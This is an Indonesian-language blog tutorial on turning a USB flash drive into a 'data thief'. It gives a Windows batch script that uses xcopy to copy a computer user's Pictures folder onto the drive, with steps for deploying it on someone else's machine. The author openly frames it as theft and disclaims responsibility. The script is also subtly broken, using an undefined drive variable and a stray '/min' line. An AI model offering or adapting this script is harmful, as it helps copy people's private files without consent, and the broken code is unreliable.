-->

Cara menjadikan flashdisk sebagai alat pencuri data

flashdisk pencuri data

flashdisk adalah alat penyimpan data/file yang berupa NAND. Didalam perangkat ini, tertanam controller dan memori penyimpanan data yang bersifat non – volatile alias tidak akan hilang meskipun tidak terdapat aliran arus listrik.

banyak sekali fungsi flashdisk seperti media pemindahan data dari satu komputer ke komputer lainnya, menyimpan data-data berupa file tulisan, gambar, mp3, video, software (perangkat lunak), dibuat bootable flashdisk windows untuk dipakai reparasi pc/ laptop dan masih banyak kegunaan lainnya.

tapi kali ini saya akan memberikan tutorial cara menjadikan flashdisk sebagai alat pencuri data. yah.. judulnya memang tak terlihat baik yah tapi di sini saya memberikan tutorial ini hanya untuk pengalaman saja yh, jadi jika agan di gunakan yg lain-lain resiko di tanggung pemenang...

1. Langkah petama kita buka notepad, lalu ketikan kode berikut :




@echo off 

:: variables 

/min 

SET odrive=%odrive:~0,2% 

set backupcmd=xcopy /s /c /d /e /h /i /r /y 

echo off 

%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics" 

@echo off 


cls



ket: "%USERPROFILE%\pictures" adlh lokasi file target yg akan kita curi/salin dan "all\My pics" adlh lokasi hasil salinan, kode tersebut bisa kita ubah (kreasikan sendiri)

2. kemudian simpan file tersebut di flashdisk dgn nama terserah kita tapi dengan format ".bat" dan type file "all files"
kemudian klik "save"

3. buat folder di flashdisk dengan nama "all"

dan file tersebut siap di gunakan, cara menggunakannya tinggal di klik ajh file yg berformat ".bat" dan komputer akan menyalin smua file yg ada di folder "\pictures" dan akan meletakan hasil salinanny di folder "all\my pics" secara otomatis.

Untuk lebih jelasnya kalian bisa lihat video di bawah :



Baiklah sekian dulu tutorial dari saya semoga bermanfaat dan sampai jumpa di tutorial berikutnya...


Related Posts

Post a Comment

Subscribe Our Newsletter